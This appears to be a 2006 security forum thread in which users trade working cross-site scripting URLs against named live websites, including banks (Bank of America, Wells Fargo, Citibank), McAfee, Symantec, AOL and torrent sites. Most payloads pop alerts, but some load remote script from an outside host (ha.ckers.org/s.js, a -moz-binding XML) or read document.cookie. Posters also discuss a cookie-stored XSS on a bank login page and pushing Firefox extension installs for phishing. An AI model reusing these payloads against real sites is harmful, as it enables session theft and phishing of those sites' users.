Style.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.style.com/services/newsletters&toolkit.application=newsletter&toolkit.applicationId=&formName=shortForm&partnerCode=&sourceCode=&newsletterAndVersions=newsletter.17&newsletterAndVersions=newsletter.35&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&IMAGE.x=0&IMAGE.y=0

Yah, she owns. Hahah...

- RSnake
Gotta love it. http://ha.ckers.org

I really recommend against dating him, girl: http://dontdatehimgirl.com/search/search_results.asp?search=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Search&search_options=+OR+

- RSnake
Gotta love it. http://ha.ckers.org

btw, do you know the answer to the question i asked on jeremiah grossman's blog? i haven't messed around much with extensions.. nor firfox's security practices for em

Quote

well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org


So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way

-maluc

I'm not sure if doing something like a META refresh to a data directive might do it since it's on the same domain or not. I've done some tests and I was able to get over 3k into a single data directive, which should be enough to load an .xpi file. I think it's doable, but I'm not sure if it will cause a popup or not, I haven't gone that far into testing.

- RSnake
Gotta love it. http://ha.ckers.org

well i was more curious about the whether or not theres a way to bypass the 'Install' button before the extensions will download

i'll mess with it more when i find the time.. in the meantime i think i'll hold off on disclosing that XSS >.>

-maluc

i don't think you can do a silent install without some firefox install, because if xpi from allowed list popup an install question.

--
http://chasenet.org/home/

The www.mozilla.com and doctor.mozilla.org ones appear to have been fixed last night.

well good job to whatever mozilla dev reads this thread.. prompt fix

-maluc

http://www.rsnake.com/results.jsp?searchTerm=all%20his%20midget%20grannie%20porn%3Cscript%3Ealert%28%22zOMG+maluc+just+owned+RSnake.%21%22%29%3C%2Fscript%3E&x=0&y=0&domainName=rsnake.com&w=false

>.>
<.<

-maluc

oh if he only owned it ;)

-id

Ugh, I hate the fact I don't own that domain... I'm not sure what I'd even do with it, but it sure sucks. That and hackers.com (they don't even respond to my bids).

Anyway, yes, nice quick fix from Mozilla! I think we have a few people very close to Mozilla reading the blog and this list. We get traffic from pretty much everywhere these days.

- RSnake
Gotta love it. http://ha.ckers.org

http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

-maluc

maluc Wrote:
-------------------------------------------------------
> http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

This has been fixed... thanks for pointing it out..



Edited 1 time(s). Last edit at 10/25/2006 10:59AM by SkullyFM.

and thanks for fixing it promptly ^^.. good job

-maluc

[www.mymms.com]
[www2.mms.com]

In the spirit of halloween, I thought I'd check out some of the sites on the candy wrappers...

Edit:
Unrelated to Halloween... Except for the whole food alergies thing...
[www.cfsan.fda.gov]



Edited 2 time(s). Last edit at 10/25/2006 05:16PM by unsticky.

Happy Halloween to you too, Unsticky :)

http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&qxt=home&display=&dclksa=1

- RSnake
Gotta love it. http://ha.ckers.org

Why thank you, rsnake

[shopping.aol.com]



Edited 1 time(s). Last edit at 10/26/2006 01:03PM by unsticky.

I was looking for a granny...

http://www.perfectmatch.com/hp/pepper/Pepper14.asp?v=2&rt=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C!--

[militaryhistory.about.com]
[search.about.com]

It appears that the offsite.htm xss vuln isnt restricted to just the militaryhistory subdomain, I beleive it'll work with just about any of them. Also, the sdn varible can be used to redirect the user to any site, which I posted in the Redirects thread, as well.



Edited 2 time(s). Last edit at 10/26/2006 04:58PM by unsticky.

http://searchg.symantec.com/search?q=';alert(%22XSS%22);//&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=gbh&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

McAfee: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.mcafee.com/virusInfo/default.asp&SearchType=2&searchString=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Slight variation on Maluc's script where a semicolon wasn't allowed so you have to create two unique style tags: http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&question_box=%22style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22style=%22xx:expression(alert('XSS')%29&url=search/&ui_mode=question

- RSnake
Gotta love it. http://ha.ckers.org

[aiw2.uspto.gov]
[appft.uspto.gov]

[messageboards.aol.com]
[peopleconnection.aol.com]
[my.screenname.aol.com]
[www.aol.com] -- Header Splitting
[us.video.aol.com]
[account.login.aol.com]
[about.aol.com] -- Almost all the AOL subdomains are vuln to this one

[www.styledash.com] -- One of AOL's sites, I wasn't in the market for fashion tips...

rsnake, I hope you don't mind me using your s.js on the patent office's site... dunno if you appriciate such things showing up in logs and all... And my appologies for spending so much time on aol.com :X



Edited 12 time(s). Last edit at 10/27/2006 01:30AM by unsticky.

Create a boarding pass for NWA

http://www.dubfire.net/boarding_pass/nwa.php?fname=Osama&lname=Bin+Laden&seatnum=07-C&gatenum=A10&date=27OCT2006&flight=7305&gatenum=A10&deptcity=Indianapolis%2C+IN%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&destcity=Washington+-+Reagan+Nat%27l&depttime=10%3A50AM&desttime=1%3A30PM&class=Coach+Class

how about we start on bank sites.. i'll continue where rsnake left off

https://www.wellsfargo.com/app2k/prefill_invoke.jhtml?event=BeginAppsFlow&context=ApplicationViewAll&productsetid=APP2K&productcode=CH%22><script>alert(%22Happy%20Halloween%22)</script><x

-maluc

okie, well i'm not sure what can be done with this one.. but it's interesting as i don't see them very often. it's a cookie XSS .. using the cookie info:

Site: web.da-us.citibank.com
Cookie Name: username
Content: 1|asdf"><script>alert("XSS")</script><x

page that's XSS'ed: https://web.da-us.citibank.com/cgi-bin/citifi/scripts/login2/login.jsp?M=S

Can you forge cookies remotely using response splitting? Or perhaps with flash? i.e. is it exploitable for CSRF. At the very least, i suppose finding another XSS that's reflective can use this one to make a pseudo-persistent XSS, for the life of the cookie..

-maluc

Searching for granny downloads

http://www.torrentspy.com/uploadtorrent.asp?TN=asdf%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C%22&lngMainCat=&lngSubCat=&ts=
http://isohunt.com/torrents/?ihq=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.torrentportal.com/torrents-upload.php&name=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Torrentportal
http://tr.searching.com/search.php?_br=tr&search=&words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cid=&type=2&exclude=&sizemin=&sizemax=&from_m=10&from_d=27&from_y=2001&to_m=10&to_d=27&to_y=2006&orderby=relevance&asc=0 - torrentreactor
http://btjunkie.org/search?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Ctitle%3E
http://www.mininova.org/search/?search=asdf%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cscript%3E

[www.commerceonline.com]



Edited 1 time(s). Last edit at 10/27/2006 06:27PM by unsticky.

http://www.communitybanks.com/index.cfm?pag=23&searchstring=%3Cbody+onload%3Dalert%28%27xss%27%29%3E&submit.x=0&submit.y=0

http://www.cio-today.com/fullpage/fullpage.xhtml?dest=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E